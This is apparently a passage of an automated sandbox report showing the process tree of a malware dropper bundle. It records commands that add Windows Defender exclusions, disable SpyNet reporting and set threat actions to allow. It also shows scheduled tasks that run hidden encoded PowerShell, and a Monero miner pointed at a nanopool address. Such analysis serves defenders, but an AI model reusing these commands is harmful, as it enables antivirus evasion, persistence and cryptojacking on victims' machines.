\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAxhBYnCm" /SC once /ST 07:06:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 11:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\pANoQky.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Users\Admin\Documents\FBq71NHn3B99I5sY8fDYdWfv.exe"C:\Users\Admin\Documents\FBq71NHn3B99I5sY8fDYdWfv.exe"8⤵
-
C:\Users\Admin\Documents\WUXz0aDp4dfQm0jqCNBkLRMV.exe"C:\Users\Admin\Documents\WUXz0aDp4dfQm0jqCNBkLRMV.exe" silent8⤵
-
C:\Users\Admin\Documents\csd88PDQZtISk4QhxvoPVz04.exe"C:\Users\Admin\Documents\csd88PDQZtISk4QhxvoPVz04.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LH3O2.tmp\csd88PDQZtISk4QhxvoPVz04.tmp"C:\Users\Admin\AppData\Local\Temp\is-LH3O2.tmp\csd88PDQZtISk4QhxvoPVz04.tmp" /SL5="$4047E,506127,422400,C:\Users\Admin\Documents\csd88PDQZtISk4QhxvoPVz04.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-C1UDU.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-C1UDU.tmp\Sharefolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Common Files\XBSTOVHWPB\foldershare.exe"C:\Program Files\Common Files\XBSTOVHWPB\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\48-60a7f-60f-7b28b-7a4d1711440c2\Buhinylaco.exe"C:\Users\Admin\AppData\Local\Temp\48-60a7f-60f-7b28b-7a4d1711440c2\Buhinylaco.exe"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0xe0,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb035471813⤵
-
C:\Users\Admin\AppData\Local\Temp\56-903d9-83a-55fbb-80d218e1eb34f\Xejulakypu.exe"C:\Users\Admin\AppData\Local\Temp\56-903d9-83a-55fbb-80d218e1eb34f\Xejulakypu.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0t41crht.bii\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\0t41crht.bii\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0t41crht.bii\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16132 -s 28014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsk0dw3c.e4b\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\xsk0dw3c.e4b\installer.exeC:\Users\Admin\AppData\Local\Temp\xsk0dw3c.e4b\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uvmpfpce.htb\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uvmpfpce.htb\any.exeC:\Users\Admin\AppData\Local\Temp\uvmpfpce.htb\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3e2n3veg.zwf\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\3e2n3veg.zwf\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3e2n3veg.zwf\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 28014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jnc0ggg3.utx\autosubplayer.exe /S & exit12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ycWCTC54TlrQm0mZXPsuqm8m.exe"C:\Users\Admin\Documents\ycWCTC54TlrQm0mZXPsuqm8m.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 2807⤵
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\dZkG2OPoMBTkHjSZSFXRaVbC.exe"C:\Users\Admin\Documents\dZkG2OPoMBTkHjSZSFXRaVbC.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\fgDR8hyJENJYl9yqtAWdPr0t.exe"C:\Users\Admin\Documents\fgDR8hyJENJYl9yqtAWdPr0t.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\spcXk4nVIHzYkQq80aGWITZP.exe"C:\Users\Admin\Documents\spcXk4nVIHzYkQq80aGWITZP.exe"6⤵
-
C:\Users\Admin\Documents\spcXk4nVIHzYkQq80aGWITZP.exe"C:\Users\Admin\Documents\spcXk4nVIHzYkQq80aGWITZP.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\9DozPzDynjFKwiIswvyuxQd7.exe"C:\Users\Admin\Documents\9DozPzDynjFKwiIswvyuxQd7.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 17287⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\SIuGHWmF4Z6WP1DdWfBnxgwe.exe"C:\Users\Admin\Documents\SIuGHWmF4Z6WP1DdWfBnxgwe.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSA8BE.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC87B.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIDAqtACE" /SC once /ST 05:52:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 11:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\pAShWVm.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\TydYjWcKOLCgML1eymMMQ4Z5.exe"C:\Users\Admin\Documents\TydYjWcKOLCgML1eymMMQ4Z5.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2848606.scr"C:\Users\Admin\AppData\Roaming\2848606.scr" /S7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Roaming\6844977.scr"C:\Users\Admin\AppData\Roaming\6844977.scr" /S7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6104082.scr"C:\Users\Admin\AppData\Roaming\6104082.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7613981.scr"C:\Users\Admin\AppData\Roaming\7613981.scr" /S7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15ac1df9305ded09.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15ac1df9305ded09.exeWed15ac1df9305ded09.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 19566⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed154a69e494d5e99ca.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed154a69e494d5e99ca.exeWed154a69e494d5e99ca.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 2288⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\inst3.exe"C:\Users\Admin\AppData\Local\Temp\inst3.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 3448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 5368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 5768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 5808⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 6208⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"installer.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-8SNS4.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-8SNS4.tmp\installer.tmp" /SL5="$502F8,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\vc.exe/install /quiet8⤵
- Executes dropped EXE
-
C:\Windows\Temp\{05FBF1A0-B4A8-4471-A735-7F0F41CA0ED1}\.cr\vc.exe"C:\Windows\Temp\{05FBF1A0-B4A8-4471-A735-7F0F41CA0ED1}\.cr\vc.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc.exe" -burn.filehandle.attached=556 -burn.filehandle.self=668 /quiet9⤵
- Executes dropped EXE
